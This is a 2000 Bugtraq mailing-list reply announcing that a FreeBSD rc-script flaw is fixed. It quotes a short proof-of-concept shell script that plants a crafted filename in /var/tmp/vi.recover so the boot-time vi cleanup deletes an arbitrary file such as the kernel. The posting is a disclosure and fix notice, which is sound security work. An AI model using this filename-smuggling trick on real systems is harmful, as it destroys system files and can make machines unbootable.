[13232] in bugtraq
Re: vibackup.sh
daemon@ATHENA.MIT.EDU (Kris Kennaway)
Wed Jan 5 12:52:13 2000
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.BSF.4.21.0001050221040.9841-100000@hub.freebsd.org>
Date: Wed, 5 Jan 2000 02:22:40 -0800
Reply-To: Kris Kennaway <kris@HUB.FREEBSD.ORG>
From: Kris Kennaway <kris@HUB.FREEBSD.ORG>
X-To: Loneguard <loneguard@CRAZYMONKEY.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <19991231143208.94AD11F5E8@lists.securityfocus.com>
This has just been fixed in FreeBSD 2.2-STABLE, 3.4-STABLE and
4.0-CURRENT. Thanks!
Kris
On Fri, 31 Dec 1999, Loneguard wrote:
> Looks like someone noticed this at some point in OpenBSD. Its broken
> rather than fixed ;(
>
> #!/bin/sh
> #
> # vibackup.sh - Loneguard 22/05/99
> # Open/FreeBSD/Debian /etc/rc script insecurely removes old vi files allowing deletion
> # of files
> #
> touch '/var/tmp/vi.recover/vi.CrazyMonkey vmlinuz'
> chmod 700 '/var/tmp/vi.recover/vi.CrazyMonkey vmlinuz'
> echo Now wait for ( or cause ) a reboot...
>
